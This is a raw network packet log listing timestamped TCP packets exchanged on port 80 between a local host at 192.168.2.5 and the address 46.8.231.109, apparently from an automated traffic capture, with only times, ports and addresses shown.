Sep 27, 2024 00:15:07.158850908 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158879995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158896923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158910990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158927917 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158941984 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158951998 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158968925 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158982992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158996105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158996105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.159019947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.159019947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.161544085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161569118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161582947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161617994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161626101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.161633015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161648035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161663055 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.161725998 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.161736965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161751986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161767006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161782026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161786079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.161815882 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.161829948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161844969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161856890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.161875963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.161881924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161887884 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.161899090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161914110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.161931038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.161945105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.161978006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162050962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162065983 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162081003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162096024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162111044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162115097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162115097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162126064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162142992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162192106 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162288904 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162305117 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162318945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162333965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162348032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162362099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162369013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162369013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162378073 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162391901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162406921 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162415981 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162415981 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162420988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162436008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162451029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162455082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162492037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162492037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162552118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162568092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162615061 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162616014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162729979 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162750959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162774086 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162791967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162791967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162796021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162817955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162832975 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162832975 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162841082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162863016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162868977 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162884951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162908077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162921906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162921906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162930965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162954092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.162955046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162955046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162976027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.162977934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.163003922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.163016081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242404938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242419004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242434025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242472887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242487907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242503881 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242515087 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242515087 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242517948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242544889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242558002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242569923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242572069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242587090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242610931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242610931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242625952 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242634058 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242649078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242661953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242686033 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242686033 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242714882 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242779970 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242794991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242809057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242820978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242824078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242837906 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242851973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242856979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242856979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242866993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242897034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242897034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242923021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242928982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242940903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242955923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.242976904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242976904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.242999077 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.243277073 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243292093 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243305922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243319988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243334055 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243350983 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.243355036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243377924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243400097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.243400097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.243402958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243417978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243427038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.243438959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243453979 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243460894 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.243460894 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.243468046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243482113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243491888 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.243496895 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243530035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.243546009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.243571043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.243616104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.245383978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245455027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.245731115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245745897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245754004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245770931 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245786905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245800972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245805025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.245817900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245824099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.245834112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245848894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245862961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245863914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.245863914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.245877028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245899916 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.245899916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245917082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.245925903 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.245963097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.245963097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.245985985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.246000051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.246014118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.246027946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.246031046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.246042967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.246057034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.246058941 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.246058941 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.246072054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.246085882 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.246087074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.246099949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.246114016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.246115923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.246136904 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.246151924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.246160030 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.246160030 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.246187925 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.246201038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.246531010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.246622086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.248469114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248483896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248497963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248511076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248526096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248539925 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248553991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248553991 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.248553991 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.248569012 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248599052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.248599052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.248620033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248635054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248648882 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248657942 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.248657942 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.248662949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248675108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.248680115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248692989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248708963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.248712063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.248712063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.248738050 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.248768091 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.248990059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249003887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249018908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249032974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249046087 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249059916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249067068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249073029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249080896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249089003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249097109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249106884 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249106884 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249146938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249162912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249176979 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249185085 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249185085 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249191046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249197960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249203920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249211073 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249212980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249226093 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249241114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249254942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249272108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249272108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249278069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249290943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249303102 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249305964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249324083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249414921 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249418020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249433994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249469042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249514103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249586105 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249599934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249614954 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249629021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249641895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249641895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249644041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249655962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249670029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249679089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249679089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249685049 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249699116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249700069 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249713898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249717951 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249728918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249743938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.249761105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249761105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.249795914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330418110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330481052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330507040 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330514908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330538988 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330565929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330605984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330620050 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330620050 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330656052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330657005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330689907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330713987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330722094 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330745935 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330754042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330786943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330796957 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330796957 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330830097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330837011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330874920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330898046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330907106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330923080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330939054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330976009 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.330986023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.330986977 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331017971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331043959 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331051111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331082106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331088066 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331113100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331127882 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331127882 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.331146002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.331176996 CEST	80	49708	46.8.231.109	192.168.2.5
